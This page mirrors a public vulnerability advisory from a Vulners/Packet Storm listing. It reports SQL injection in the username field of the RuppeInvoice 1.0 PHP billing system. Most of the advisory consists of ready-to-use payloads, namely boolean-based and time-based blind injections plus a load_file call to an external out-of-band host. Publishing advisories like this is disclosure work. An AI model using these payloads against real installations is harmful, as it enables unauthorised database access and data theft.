Lucene search
K

RUPPEINVOICE 1.0 SQL Injection

🗓️ 11 Mar 2024 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 275 Views

RuppeInvoice 1.0 SQL Injection affecting username parameter, allowing attacker to execute sub-query and extract system information

Code
`## Title: RUPPEINVOICE-1.0 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 03/09/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The username parameter appears to be vulnerable to SQL injection  
attacks. The payload '+(select  
load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'  
was submitted in the username parameter. This payload injects a SQL  
sub-query that calls MySQL's load_file function with a UNC file path  
that references a URL on an external domain. The application  
interacted with that domain, indicating that the injected SQL query  
was executed. The attacker can get all information from the system by  
using this vulnerability!  
  
STATUS: HIGH- Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: username (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: username=zBuveHif'+(select  
load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''  
OR NOT 6356=6356 AND 'Eocq'='Eocq&password=g7J!m3v!W2&login=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=zBuveHif'+(select  
load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''  
AND (SELECT 4013 FROM (SELECT(SLEEP(7)))BnHP) AND  
'bCQt'='bCQt&password=g7J!m3v!W2&login=  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/RUPPEINVOICE-1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/ruppeinvoice-10-multiple-sqli.html)  
  
## Time spend:  
00:35:00  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation